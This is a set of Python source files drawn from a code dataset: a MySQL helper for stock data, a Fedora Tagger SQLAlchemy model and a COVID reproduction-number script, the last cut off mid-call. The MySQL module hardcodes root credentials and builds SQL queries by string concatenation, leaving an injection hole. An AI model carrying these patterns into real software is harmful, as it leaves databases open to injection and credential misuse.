' \\\n 'For more information, please check out purchase history.'\n for owner in users:\n notification = message.format(owner, store_name)\n self.notify(notification, owner)\n","sub_path":"project/domain_layer/communication_managment/Publisher.py","file_name":"Publisher.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"57392299","text":"__author__ = 'qbinghe'\n\n# NOTE: We will do this when MySql official connector supports python 3\n# Then we will replace sql.write_frame with sql.to_sql\n# from sqlalchemy import create_engine\n# engine = create_engine('mysql://root:1234@127.0.0.1/stock_database')\n\nimport mysql.connector\nimport globalData as gData\nimport pandas as pd\nimport warnings\nimport helper as myHelper\nimport re\nfrom pandas.io import sql\n\n# Trade data info\n# tradeData_daily_TB = 'trade_data_daily'\n# tradeData_weekly_TB = 'trade_data_weekly'\n# tradeData_monthly_TB = 'trade_data_monthly'\n# tradeData_yearly_TB = 'trade_data_yearly'\n#\n# dataType_dataTable_mapping = {\n# gData.DataType.daily : dict(zip(['dbTableName', 'dbOrderBy', 'dbDateColumn'], [tradeData_daily_TB, 'date', 'date'])),\n# gData.DataType.weekly : dict(zip(['dbTableName', 'dbOrderBy', 'dbDateColumn'], [tradeData_weekly_TB, 'week', 'week']))\n# }\n\n# ======== DATABASE ==========\n# Database file name ends with _DB\n# Database table name ends with _TB\n# Database view name ends with _VW\n# Database column name starts with col_[ONE_CAPITAL_LETTER_HERE]...\n\n# We have two data:\n# 000. Complete data contains all the following data (complete_data)\n# 1. Trade data (Trade_data)\n# 2. TA data (indicator_data)\n#\n# All these data contains information _daily, _weekly, and _monthly\ndatabasePath = 'db/'\ninit_script = databasePath + 'initDatabse.sql'\ntmp_init_script = databasePath + 'initDatabse.tmp.sql'\n\nstock_database = 'stock_database'\n\n# Stock info\nstockSymbol_TB = 'stock_symbol' # contains symbol and full name of the stock\n\n\n\ndef dbFetchStockInfo():\n sql_str = 'SELECT * FROM ' + stockSymbol_TB\n gData.allStockDF = dbSelectOperation(sql_str)\n\n# Update init script from www.vertabelo.com\ndef updateInitSQLScript():\n try:\n myHelper.debugDB(\"Updating init SQL script...\")\n finalScriptFile = open(tmp_init_script, 'w')\n with open(init_script, 'r') as scriptFile:\n content = scriptFile.readlines()\n for line in content:\n newLine = line\n\n # MySQL sucks with creating index so drop it. We care only about PK anyways\n m = re.match('(CREATE INDEX)(.*)', newLine)\n if m: continue\n\n m1 = re.match('(CREATE (TABLE|VIEW))(.*)', newLine)\n if m1: newLine = m1.groups()[0] + ' IF NOT EXISTS' + m1.groups()[2] + ' \\n'\n\n finalScriptFile.write(newLine)\n return finalScriptFile\n except Exception as e:\n myHelper.debugDB(\"Error while updating init SQL script:\")\n myHelper.debugDB(e)\n finally:\n if scriptFile is not None: scriptFile.close()\n if finalScriptFile is not None: finalScriptFile.close()\n\n# Modeling is done on www.vertabelo.com. 
Use the generated SQL script to init database in MySQL\ndef initDatabaseFromScript():\n updateInitSQLScript()\n try:\n myHelper.debugDB(\"Running init SQL script...\")\n cnx = getMySQLConnection(noDB = True)\n cursor = cnx.cursor()\n # Make sure the database exists\n cursor.execute('CREATE DATABASE IF NOT EXISTS ' + stock_database)\n cnx.commit()\n\n cnx.database = stock_database\n tmpScript = open(tmp_init_script, 'r') # tmp_init_script updated in updateInitSQLScript()\n results = cursor.execute(tmpScript.read(), multi=True)\n for dummy_cur in results: pass # Have to loop through all results to execute statements, DUMB!\n cnx.commit()\n tmpScript.close()\n myHelper.debugDB(\"Changes successfully committed\")\n except Exception as e:\n myHelper.debugDB(\"Something went wrong during initializing database:\")\n myHelper.debugDB(e)\n finally:\n myHelper.debugDB(\"Closing DB\")\n # Test if they exist\n if cursor is not None: cursor.close()\n if cnx is not None: cnx.close()\n if tmpScript is not None: tmpScript.close()\n\n\n\ndef insertData(dbTableName, dbDateColumn, df):\n _insertData(df, dbTableName)\n\ndef insertInfoData(df):\n _insertData(df, stockSymbol_TB)\n\ndef _insertData(df, tableName):\n conn = getMySQLConnection()\n # sql.to_sql(df, name=tablename, con=conn, if_exists='append', index=False)\n suppressWriteFrameWarning()\n sql.write_frame(frame= df, name=tableName, con=conn, flavor='mysql', if_exists='append', index=False)\n\n\ndef dbGetDataByOmxid(omxid, tableName, orderBy):\n sql_str = 'SELECT * FROM ' + tableName + ' where omxid = \\'' + omxid + '\\' ORDER BY ' + orderBy + ' ASC'\n return dbSelectOperation(sql_str)\n\ndef deleteData(dbTableName, dbDateColumn, df):\n # DELETE FROM table WHERE (col1,col2) IN ((1,2),(3,4),(5,6))\n keyStr = myHelper.generateKeyDateList(df[ ['omxid', dbDateColumn]].values.tolist())\n sqlStr = 'DELETE FROM ' + dbTableName + ' WHERE (omxid, ' + dbDateColumn + ') IN (' + ','.join(keyStr) + ')'\n dbDeleteOperation(sqlStr)\n\n\n###########################\n### Database helper\n###########################\ndef dbSelectOperation(sqlStr):\n conn = getMySQLConnection()\n myHelper.debugDB(sqlStr)\n df = pd.read_sql(sqlStr, conn)\n conn.close()\n return df\n\ndef dbDeleteOperation(sqlStr):\n dbExecuteSQLStatement(sqlStr)\n\ndef dbExecuteSQLStatement(sqlStr):\n conn = getMySQLConnection()\n myHelper.debugDB(sqlStr)\n cursor = conn.cursor()\n cursor.execute(sqlStr)\n conn.commit()\n\ndef getMySQLConnection(noDB = False):\n if noDB:\n conn = mysql.connector.connect(user='root', password='1234', host='127.0.0.1')\n else:\n conn = mysql.connector.connect(user='root', password='1234', host='127.0.0.1', database=stock_database)\n\n class My_SQLConverter(mysql.connector.conversion.MySQLConverter):\n def _DATE_to_python(self, value, dsc=None):\n # Raw value is byte array, need to decode\n return value.decode(\"utf-8\")\n #_NEWDATE_to_python = _DATE_to_python\n\n conn.set_converter_class(My_SQLConverter)\n return conn\n\ndef suppressWriteFrameWarning():\n warnings.filterwarnings(\"ignore\", message=\"write_frame is deprecated, use to_sql\")\n warnings.filterwarnings(\"ignore\", message=\"The 'mysql' flavor with DBAPI connection is deprecated.*\")\n\ndef callDBProc(row):\n conn = getMySQLConnection()\n cursor = conn.cursor()\n print(type(row['date']))\n args = [row['date']]\n results=cursor.callproc( \"new_procedure\", args)\n 
conn.commit()","sub_path":"databaseOperation.py","file_name":"databaseOperation.py","file_ext":"py","file_size_in_byte":6397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"466193588","text":"# This file is a part of Fedora Tagger\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n# MA 02110-1301 USA\n#\n# Refer to the README.rst and LICENSE files for full details of the license\n# -*- coding: utf-8 -*-\n\"\"\"The application's model objects\"\"\"\nfrom __future__ import print_function\n\nimport json\nimport os\nfrom datetime import datetime\n\nimport pkgwat.api\nimport fedmsg\n\nfrom sqlalchemy import *\nfrom sqlalchemy import Table, ForeignKey, Column\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relation, backref, synonym\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom sqlalchemy.types import Integer, Unicode\n\nfrom kitchen.text.converters import to_unicode\n\nimport fedora.client\nfas = fedora.client.AccountSystem()\n\nDeclarativeBase = declarative_base()\n\n\ndef create_tables(db_url, alembic_ini=None, debug=False):\n \"\"\" Create the tables in the database using the information from the\n url obtained.\n\n :arg db_url, URL used to connect to the database. The URL contains\n information with regards to the database engine, the host to connect\n to, the user and password and the database name.\n ie: ://:@/\n :kwarg alembic_ini, path to the alembic ini file. 
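The module above still routes writes through the long-deprecated sql.write_frame; the to_sql migration its header comment anticipates looks roughly like this (SQLite stands in for the MySQL engine to keep the sketch self-contained):

import pandas as pd
from sqlalchemy import create_engine

engine = create_engine("sqlite://")
df = pd.DataFrame({"omxid": ["OMX1", "OMX2"], "close": [101.5, 99.25]})
# Matches the write_frame call: append rows, do not write the index.
df.to_sql("trade_data_daily", engine, if_exists="append", index=False)
print(pd.read_sql("SELECT * FROM trade_data_daily", engine))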
This is necessary\n to be able to use alembic correctly, but not for the unit-tests.\n :arg debug, a boolean specifying wether we should have the verbose\n output of sqlalchemy or not.\n :return a session that can be used to query the database.\n \"\"\"\n engine = create_engine(db_url, echo=debug)\n DeclarativeBase.metadata.create_all(engine)\n\n if alembic_ini is not None: # pragma: no cover\n # then, load the Alembic configuration and generate the\n # version table, \"stamping\" it with the most recent rev:\n from alembic.config import Config\n from alembic import command\n alembic_cfg = Config(alembic_ini)\n command.stamp(alembic_cfg, \"head\")\n\n scopedsession = scoped_session(sessionmaker(bind=engine))\n return scopedsession\n\n\ndef tag_sorter(tag1, tag2):\n \"\"\" The tag list for each package should be sorted in descending order by\n the total score, ties are broken by the number of votes cast and if there\n is still a tie, alphabetically by the tag.\n \"\"\"\n for attr in ['total', 'votes', 'label']:\n result = cmp(getattr(tag1, attr), getattr(tag2, attr))\n if result != 0:\n return result\n return result\n\n\nclass YumTags(DeclarativeBase):\n \"\"\" Table packagetags to records simple association of package name\n with tags and the number of vote on the tag.\n \"\"\"\n __tablename__ = 'packagetags'\n\n name = Column(Text, nullable=False, primary_key=True)\n tag = Column(Text, nullable=False, primary_key=True)\n score = Column(Integer)\n\n @classmethod\n def all(cls, session):\n \"\"\" Return all the information. \"\"\"\n return session.query(cls).all()\n\n\nclass Package(DeclarativeBase):\n __tablename__ = 'package'\n __table_args__ = (\n UniqueConstraint('name'),\n )\n\n id = Column(Integer, primary_key=True)\n name = Column(Unicode(255), nullable=False)\n summary = Column(UnicodeText(convert_unicode=False), nullable=False)\n _meta = Column(Unicode, server_default='{}', nullable=False)\n\n tags = relation('Tag', backref=('package'))\n ratings = relation('Rating', backref=('package'))\n usages = relation('Usage', backref=('package'))\n\n def rating(self, session):\n return session.query(func.avg(Rating.rating))\\\n .filter_by(package_id=self.id).one()[0]\n\n def meta(self, session):\n meta = json.loads(self._meta or '{}')\n if not meta:\n try:\n meta = pkgwat.api.get(self.name)\n self._meta = json.dumps(meta)\n session.add(self)\n session.commit()\n except Exception as e:\n print(\"Failed to get meta: %r from fedora-packages\" % self.name)\n print(str(e))\n\n return meta\n\n def icon(self, sess):\n # TODO - cache this in the db so we don't have to hit pkgwat.\n tmpl = \"https://apps.fedoraproject.org/packages/images/icons/%s.png\"\n return tmpl % (self.meta(sess).get('icon', None) or 'package_128x128')\n\n def xapian_summary(self, sess):\n return self.meta(sess).get('summary', None) or ''\n\n @classmethod\n def by_name(cls, session, pkgname):\n \"\"\" Returns the Package corresponding to the provided package\n name.\n\n :arg session: the session used to query the database\n :arg pkgname: the name of the package (string)\n :raise sqlalchemy.orm.exc.NoResultFound: when the query selects\n no rows.\n :raise sqlalchemy.orm.exc.MultipleResultsFound: when multiple\n rows are matching.\n \"\"\"\n return session.query(cls).filter_by(name=pkgname).one()\n\n @classmethod\n def random(cls, session):\n \"\"\" Returns a random package from the database.\n\n :arg session: the session used to query the database\n :arg pkgname: the name of the package (string)\n \"\"\"\n result = 
session.query(cls).order_by(func.random()).first()\n if not result:\n raise NoResultFound()\n return result\n\n @classmethod\n def all(cls, session):\n \"\"\" Returns all Package entries in the database.\n\n :arg session: the session used to query the database\n \"\"\"\n return session.query(cls).all()\n\n @property\n def usage(self):\n return len(self.usages)\n\n def __unicode__(self):\n return self.name\n\n def __json__(self, session):\n \"\"\" JSON.. kinda. \"\"\"\n\n tags = []\n for tag in self.tags:\n tags.append(tag.__json__())\n\n rating = Rating.rating_of_package(session, self.id) or -1\n result = {\n 'name': self.name,\n 'summary': self.summary,\n 'tags': tags,\n 'rating': int(rating),\n 'usage': self.usage,\n 'icon': self.icon(session),\n }\n\n return result\n\n def __tag_json__(self):\n\n tags = []\n for tag in self.tags:\n tags.append(tag.__json__())\n\n result = {\n 'name': self.name,\n 'tags': tags,\n }\n\n return result\n\n def __rating_json__(self, session):\n\n rating = Rating.rating_of_package(session, self.id) or -1\n result = {\n 'name': self.name,\n 'rating': float(rating),\n }\n\n return result\n\n def __usage_json__(self, session):\n return {\n 'name': self.name,\n 'usage': self.usage,\n }\n\n def __jit_data__(self):\n return {\n 'hover_html':\n u\"

Package: {name}\n\n    \" +\n \" \".join([\n \"\n  • {tag.label.label} - {tag.like} / {tag.dislike}\n  • \"\n .format(tag=tag) for tag in self.tags\n ]) + \"
\"\n }\n\n\nclass Tag(DeclarativeBase):\n __tablename__ = 'tag'\n __table_args__ = (\n UniqueConstraint('package_id', 'label'),\n )\n\n id = Column(Integer, primary_key=True)\n package_id = Column(Integer, ForeignKey('package.id'))\n label = Column(Unicode(255), nullable=False)\n votes = relation('Vote', backref=('tag'))\n\n like = Column(Integer, default=1)\n dislike = Column(Integer, default=0)\n\n @property\n def banned(self):\n \"\"\" We want to exclude some tags permanently.\n\n https://github.com/ralphbean/fedora-tagger/issues/16\n \"\"\"\n\n return any([\n self.label.startswith('x-'),\n self.label == 'application',\n self.label == 'system',\n self.label == 'utility',\n ])\n\n @property\n def total(self):\n return self.like - self.dislike\n\n @property\n def total_votes(self):\n return self.like + self.dislike\n\n @classmethod\n def get(cls, session, package_id, label):\n return session.query(cls).filter_by(package_id=package_id\n ).filter_by(label=label).one()\n\n @classmethod\n def by_label(cls, session, label):\n return session.query(cls).filter_by(label=label).all()\n\n @classmethod\n def count_unique_label(cls, session):\n return session.query(func.count(distinct(cls.label))).first()[0]\n\n def __unicode__(self):\n return self.label + \" on \" + self.package.name\n\n def __pkg_json__(self):\n result = {\n 'tag': self.label,\n 'like': self.like,\n 'dislike': self.dislike,\n 'total': self.total,\n 'votes': self.total_votes,\n 'package': self.package.name\n }\n\n return result\n\n __json__ = __pkg_json__\n\n def __jit_data__(self):\n return {\n 'hover_html':\n u\"\"\"

Tag: {label}\n\n\n\n    \n\n  • Likes: {like}\n  • \n\n  • Dislike: {dislike}\n  • \n\n  • Total: {total}\n  • \n\n  • Votes: {votes}\n  • \n
\n \"\"\".format(\n label=unicode(self),\n like=self.like,\n dislike=self.dislike,\n total=self.total,\n votes=self.votes,\n )\n }\n\n\nclass Vote(DeclarativeBase):\n __tablename__ = 'vote'\n __table_args__ = (\n UniqueConstraint('user_id', 'tag_id'),\n )\n\n id = Column(Integer, primary_key=True)\n like = Column(Boolean, nullable=False)\n user_id = Column(Integer, ForeignKey('user.id'))\n tag_id = Column(Integer, ForeignKey('tag.id'))\n\n @classmethod\n def get(cls, session, user_id, tag_id):\n return session.query(cls).filter_by(user_id=user_id\n ).filter_by(tag_id=tag_id).one()\n\n @classmethod\n def get_votes_user(cls, session, user_id):\n return session.query(cls).filter_by(user_id=user_id).all()\n\n def __json__(self):\n\n result = {\n 'like': self.like,\n 'user': self.user.__json__(),\n 'tag': self.tag.__json__(),\n }\n\n return result\n\n\nclass Usage(DeclarativeBase):\n __tablename__ = 'usage'\n __table_args__ = (\n UniqueConstraint('user_id', 'package_id'),\n )\n id = Column(Integer, primary_key=True)\n user_id = Column(Integer, ForeignKey('user.id'))\n package_id = Column(Integer, ForeignKey('package.id'))\n\n @classmethod\n def get(cls, session, package_id, user_id):\n \"\"\" Return a specific user's usage of a specific package. \"\"\"\n return session.query(cls)\\\n .filter_by(package_id=package_id)\\\n .filter_by(user_id=user_id).one()\n\n @classmethod\n def usage_of_package(cls, session, pkgid):\n \"\"\" Return the usage count of the package specified by a id\n\n :arg session: the session used to query the database\n :arg pkgid: the identifier of the package in the database\n (integer)\n \"\"\"\n return session.query(cls).filter_by(package_id=pkgid).count()\n\n @classmethod\n def all(cls, session):\n \"\"\" Return the total usage of all the packages in the database.\n\n Returns a list of tuples of the form::\n\n [\n (Package1, total_usage),\n (Package2, total_usage),\n ...\n ]\n\n :arg session: the session used to query the database\n \"\"\"\n subquery = session.query(\n cls.package_id.label('package_id'),\n func.count(cls.id).label('total_usage')\n ).group_by(cls.package_id).subquery()\n\n return session.query(Package, subquery.c.total_usage).filter(\n Package.id == subquery.c.package_id\n ).all()\n\n def __json__(self, session):\n return {\n 'user': self.user.__json__(),\n 'package': self.package.__json__(session),\n }\n\n\nclass Rating(DeclarativeBase):\n __tablename__ = 'rating'\n __table_args__ = (\n UniqueConstraint('user_id', 'package_id'),\n )\n\n id = Column(Integer, primary_key=True)\n user_id = Column(Integer, ForeignKey('user.id'))\n package_id = Column(Integer, ForeignKey('package.id'))\n rating = Column(Integer, nullable=False)\n\n @classmethod\n def get(cls, session, package_id, user_id):\n \"\"\" Return a specific user's rating on a specific package. 
\"\"\"\n return session.query(cls)\\\n .filter_by(package_id=package_id)\\\n .filter_by(user_id=user_id).one()\n\n @classmethod\n def rating_of_package(cls, session, pkgid):\n \"\"\" Return the average rating of the package specified by his\n package.id.\n\n :arg session: the session used to query the database\n :arg pkgid: the identifier of the package in the database\n (integer)\n \"\"\"\n return session.query(func.avg(cls.rating)\n ).filter_by(package_id=pkgid).one()[0]\n\n @classmethod\n def all(cls, session):\n \"\"\" Return the average rating of all the packages in the database.\n\n Returns a list of tuples of the form::\n\n [\n (Package1, average_rating),\n (Package2, average_rating),\n ...\n ]\n\n :arg session: the session used to query the database\n \"\"\"\n subquery = session.query(\n cls.package_id.label('package_id'),\n func.avg(cls.rating).label('avg_rating')\n ).group_by(cls.package_id).subquery()\n\n return session.query(Package, subquery.c.avg_rating).filter(\n Package.id == subquery.c.package_id\n ).all()\n\n @classmethod\n def by_rating(cls, session, ratingscore):\n \"\"\" Return all the packages in the database having the specified\n rating.\n\n :arg session: the session used to query the database\n \"\"\"\n subquery = session.query(\n cls.package_id.label('package_id'),\n func.avg(cls.rating).label('avg'),\n ).group_by(cls.package_id).subquery()\n\n return session.query(Package).filter(and_(\n Package.id == subquery.c.package_id,\n subquery.c.avg == ratingscore,\n )).all()\n\n def __json__(self, session):\n\n result = {\n # We type this to an int to avoid precision problems in json that\n # cascade into crypto problems between machines.\n # See https://github.com/fedora-infra/fedmsg/pull/201 for reference\n 'rating': int(self.rating),\n 'user': self.user.__json__(),\n 'package': self.package.__json__(session),\n }\n\n return result\n\n\nclass FASUser(DeclarativeBase):\n __tablename__ = 'user'\n __table_args__ = (\n UniqueConstraint('username'),\n )\n\n id = Column(Integer, primary_key=True)\n username = Column(Unicode(255), nullable=False)\n\n votes = relation('Vote', backref=('user'))\n ratings = relation('Rating', backref=('user'))\n usages = relation('Usage', backref=('user'))\n\n email = Column(Unicode(255), default=None)\n notifications_on = Column(Boolean, default=True)\n _rank = Column(Integer, default=-1)\n score = Column(Integer, nullable=False, default=0)\n api_token = Column(String(45), default=None)\n api_date = Column(Date, default=datetime.today())\n anonymous = Column(Boolean, nullable=False, default=False)\n\n @property\n def total_votes(self):\n return len(self.votes)\n\n def uses(self, session, package):\n for usage in self.usages:\n if usage.package == package:\n return True\n return False\n\n def rank(self, session):\n _rank = self._rank\n\n if self.anonymous:\n return -1\n\n users = session.query(FASUser)\\\n .filter(FASUser.username != 'anonymous').all()\n lookup = sorted(set([u.score for u in users]), reverse=True)\n rank = lookup.index(self.score) + 1\n\n # If their rank has changed.\n changed = (rank != _rank)\n\n # And it didn't change to last place. We check last_place only to try\n # and avoid spamming the fedmsg bus. We have a number of users who\n # have logged in once, and never voted. 
Everytime a *new* user logs\n # in and votes once, *all* the users in last place get bumped down\n # one notch.\n # No need to spew that to the message bus.\n is_last = (rank == len(lookup))\n\n if changed:\n self._rank = rank\n session.add(self)\n session.commit()\n\n if changed and not is_last:\n fedmsg.send_message(topic='user.rank.update', msg={\n 'user': self,\n })\n\n return self._rank\n\n @property\n def gravatar_lg(self):\n return self._gravatar(s=140)\n\n @property\n def gravatar_md(self):\n return self._gravatar(s=64)\n\n @property\n def gravatar_sm(self):\n return self._gravatar(s=32)\n\n def _gravatar(self, s):\n url = fas.avatar_url(self.username, size=s, lookup_email=False)\n return \"\" % url\n\n @classmethod\n def get_or_create(cls, session, username, email=None,\n anonymous=False):\n \"\"\" Get or Add a user to the database using its username.\n This function simply tries to find the specified username in the\n database and if that person is not known, add a new user with\n this username.\n\n :arg session: the session used to query the database.\n :arg username: the username of the user to search for or to\n create. In some cases it will be his IP address.\n :kwarg email: the email address to associate with this user.\n :kwarg anonymous: a boolean specifying if the user is anonymous\n or not.\n \"\"\"\n try:\n user = session.query(cls).filter_by(username=username).one()\n if email:\n user.email = email\n except NoResultFound:\n user = FASUser(username=username,\n email=email,\n anonymous=anonymous)\n session.add(user)\n session.flush()\n return user\n\n @classmethod\n def top(cls, session, limit=10):\n \"\"\" Return the top contributors ordered by their scores.\n\n :arg session: the session used to query the database.\n :kwarg limit: the max number of user to return.\n \"\"\"\n return session.query(cls\n ).filter(FASUser.anonymous == False\n ).order_by(FASUser.score.desc()\n ).limit(limit\n ).all()\n\n @classmethod\n def by_name(cls, session, username):\n \"\"\" Return the user based on the provided username.\n\n :arg session: the session used to query the database.\n :arg username: the username of the desired user.\n \"\"\"\n return session.query(cls\n ).filter(FASUser.username == username\n ).filter(FASUser.anonymous == False\n ).one()\n\n def __json__(self, visited=None):\n obj = {\n 'username': self.anonymous and 'anonymous' or self.username,\n 'votes': self.total_votes,\n 'score': self.score,\n 'rank': self._rank,\n 'anonymous': self.anonymous,\n }\n\n return obj\n","sub_path":"fedoratagger/lib/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":20156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"118590881","text":"\"\"\"Calculate Rt given a posterior\"\"\"\nimport argparse\nimport os\nimport yaml\nimport h5py\nimport numpy as np\nimport pandas as pd\nimport geopandas as gp\n\nimport tensorflow as tf\nfrom gemlib.util import compute_state\n\nfrom covid.cli_arg_parse import cli_args\nfrom covid.summary import (\n rayleigh_quotient,\n power_iteration,\n)\nfrom covid.summary import mean_and_ci\n\nimport model_spec\n\nDTYPE = model_spec.DTYPE\n\nGIS_TEMPLATE = \"data/UK2019mod_pop.gpkg\"\n\n\n# Reproduction number calculation\ndef calc_R_it(param, events, init_state, covar_data, priors):\n \"\"\"Calculates effective reproduction number for batches of metapopulations\n :param theta: a tensor of batched theta parameters [B] + theta.shape\n :param xi: a tensor of batched xi parameters [B] + 
param.shape\n :param events: a [B, M, T, X] batched events tensor\n :param init_state: the initial state of the epidemic at earliest inference date\n :param covar_data: the covariate data\n :return: a batched vector of R_it estimates\n \"\"\"\n\n def r_fn(args):\n beta1_, beta2_, beta3_, sigma_, xi_, gamma0_, events_ = args\n t = events_.shape[-2] - 1\n state = compute_state(init_state, events_, model_spec.STOICHIOMETRY)\n state = tf.gather(state, t, axis=-2) # State on final inference day\n\n model = model_spec.CovidUK(\n covariates=covar_data,\n initial_state=init_state,\n initial_step=0,\n num_steps=events_.shape[-2],\n priors=priors,\n )\n\n xi_pred = model_spec.conditional_gp(\n model.model[\"xi\"](beta1_, sigma_),\n xi_,\n tf.constant(\n [events.shape[-2] + model_spec.XI_FREQ], dtype=model_spec.DTYPE\n )[:, tf.newaxis],\n )\n\n par = dict(\n beta1=beta1_,\n beta2=beta2_,\n beta3=beta3_,\n sigma=sigma_,\n gamma0=gamma0_,\n xi=xi_,\n )\n print(\"xi shape:\", par[\"xi\"].shape)\n ngm_fn = model_spec.next_generation_matrix_fn(covar_data, par)\n ngm = ngm_fn(t, state)\n return ngm\n\n return tf.vectorized_map(\n r_fn,\n elems=(\n param[\"beta1\"],\n param[\"beta2\"],\n param[\"beta3\"],\n param[\"sigma\"],\n param[\"xi\"],\n param[\"gamma0\"],\n events,\n ),\n )\n\n\n@tf.function\ndef predicted_incidence(param, init_state, init_step, num_steps, priors):\n \"\"\"Runs the simulation forward in time from `init_state` at time `init_step`\n for `num_steps`.\n :param param: a dictionary of batched parameter tensors\n :param init_state: a [B, M, S] batched state tensor\n :param init_step: the initial time step\n :param num_steps: the number of steps to simulate\n :param priors: the priors for gamma\n :returns: a tensor of shape [B, M, num_steps, X] where X is the number of state\n transitions\n \"\"\"\n\n def sim_fn(args):\n beta1_, beta2_, beta3_, sigma_, xi_, gamma0_, gamma1_, init_ = args\n\n par = dict(\n beta1=beta1_,\n beta2=beta2_,\n beta3=beta3_,\n gamma0=gamma0_,\n gamma1=gamma1_,\n xi=xi_,\n )\n\n model = model_spec.CovidUK(\n covar_data,\n initial_state=init_,\n initial_step=init_step,\n num_steps=num_steps,\n priors=priors,\n )\n sim = model.sample(**par)\n return sim[\"seir\"]\n\n events = tf.map_fn(\n sim_fn,\n elems=(\n param[\"beta1\"],\n param[\"beta2\"],\n param[\"beta3\"],\n param[\"sigma\"],\n param[\"xi\"],\n param[\"gamma0\"],\n param[\"gamma1\"],\n init_state,\n ),\n fn_output_signature=(tf.float64),\n )\n return events\n\n\n# Today's prevalence\ndef prevalence(predicted_state, population_size, name=None):\n \"\"\"Computes prevalence of E and I individuals\n\n :param predicted_state: the state at a particular timepoint [batch, M, S]\n :param population_size: the size of the population\n :returns: a dict of mean and 95% credibility intervals for prevalence\n in units of infections per person\n \"\"\"\n prev = tf.reduce_sum(predicted_state[:, :, 1:3], axis=-1) / tf.squeeze(\n population_size\n )\n return mean_and_ci(prev, name=name)\n\n\ndef predicted_events(events, name=None):\n num_events = tf.reduce_sum(events, axis=-1)\n return mean_and_ci(num_events, name=name)\n\n\nif __name__ == \"__main__\":\n\n args = cli_args()\n\n # Get general config\n with open(args.config, \"r\") as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n\n inference_period = [\n np.datetime64(x) for x in config[\"Global\"][\"inference_period\"]\n ]\n\n # Load covariate data\n covar_data = model_spec.gather_data(config)\n\n # Load
posterior file\n posterior_path = os.path.join(\n config[\"output\"][\"results_dir\"], config[\"output\"][\"posterior\"]\n )\n print(\"Using posterior:\", posterior_path)\n posterior = h5py.File(\n os.path.expandvars(posterior_path,),\n \"r\",\n rdcc_nbytes=1024 ** 3,\n rdcc_nslots=1e6,\n )\n\n # Pre-determined thinning of posterior (better done in MCMC?)\n idx = range(6000, 10000, 10)\n param = dict(\n beta1=posterior[\"samples/beta1\"][idx],\n beta2=posterior[\"samples/beta2\"][idx],\n beta3=posterior[\"samples/beta3\"][idx,],\n sigma=posterior[\"samples/sigma\"][idx,],\n xi=posterior[\"samples/xi\"][idx],\n gamma0=posterior[\"samples/gamma0\"][idx],\n gamma1=posterior[\"samples/gamma1\"][idx],\n )\n events = posterior[\"samples/events\"][idx]\n init_state = posterior[\"initial_state\"][:]\n state_timeseries = compute_state(\n init_state, events, model_spec.STOICHIOMETRY\n )\n\n # Build model\n model = model_spec.CovidUK(\n covar_data,\n initial_state=init_state,\n initial_step=0,\n num_steps=events.shape[1],\n priors=config[\"mcmc\"][\"prior\"],\n )\n\n ngms = calc_R_it(\n param, events, init_state, covar_data, config[\"mcmc\"][\"prior\"]\n )\n b, _ = power_iteration(ngms)\n rt = rayleigh_quotient(ngms, b)\n q = np.arange(0.05, 1.0, 0.05)\n rt_quantiles = pd.DataFrame(\n {\"Rt\": np.quantile(rt, q, axis=-1)}, index=q\n ).T.to_excel(\n os.path.join(\n config[\"output\"][\"results_dir\"], config[\"output\"][\"national_rt\"]\n ),\n )\n\n # Prediction requires simulation from the last available timepoint for 28 + 4 + 1 days\n # Note a 4 day recording lag in the case timeseries data requires that\n # now = state_timeseries.shape[-2] + 4\n prediction = predicted_incidence(\n param,\n init_state=state_timeseries[..., -1, :],\n init_step=state_timeseries.shape[-2] - 1,\n num_steps=70,\n priors=config[\"mcmc\"][\"prior\"],\n )\n predicted_state = compute_state(\n state_timeseries[..., -1, :], prediction, model_spec.STOICHIOMETRY\n )\n\n # Prevalence now\n prev_now = prevalence(\n predicted_state[..., 4, :], covar_data[\"N\"], name=\"prev\"\n )\n\n # Incidence of detections now\n cases_now = predicted_events(prediction[..., 4:5, 2], name=\"cases\")\n\n # Incidence from now to now+7\n cases_7 = predicted_events(prediction[..., 4:11, 2], name=\"cases7\")\n cases_14 = predicted_events(prediction[..., 4:18, 2], name=\"cases14\")\n cases_21 = predicted_events(prediction[..., 4:25, 2], name=\"cases21\")\n cases_28 = predicted_events(prediction[..., 4:32, 2], name=\"cases28\")\n cases_56 = predicted_events(prediction[..., 4:60, 2], name=\"cases56\")\n\n # Prevalence at day 7\n prev_7 = prevalence(\n predicted_state[..., 11, :], covar_data[\"N\"], name=\"prev7\"\n )\n prev_14 = prevalence(\n predicted_state[..., 18, :], covar_data[\"N\"], name=\"prev14\"\n )\n prev_21 = prevalence(\n predicted_state[..., 25, :], covar_data[\"N\"], name=\"prev21\"\n )\n prev_28 = prevalence(\n predicted_state[..., 32, :], covar_data[\"N\"], name=\"prev28\"\n )\n prev_56 = prevalence(\n predicted_state[..., 60, :], covar_data[\"N\"], name=\"prev56\"\n )\n\n def geosummary(geodata, summaries):\n for summary in summaries:\n for k, v in summary.items():\n arr = v\n if isinstance(v, tf.Tensor):\n arr = v.numpy()\n geodata[k] = arr\n\n ## GIS here\n ltla = gp.read_file(GIS_TEMPLATE, layer=\"UK2019mod_pop_xgen\")\n ltla = ltla[ltla[\"lad19cd\"].str.startswith(\"E\")] # England only, for now.\n ltla = ltla.sort_values(\"lad19cd\")\n rti = tf.reduce_sum(ngms, axis=-2)\n\n geosummary(\n ltla,\n (\n mean_and_ci(rti, name=\"Rt\"),\n 
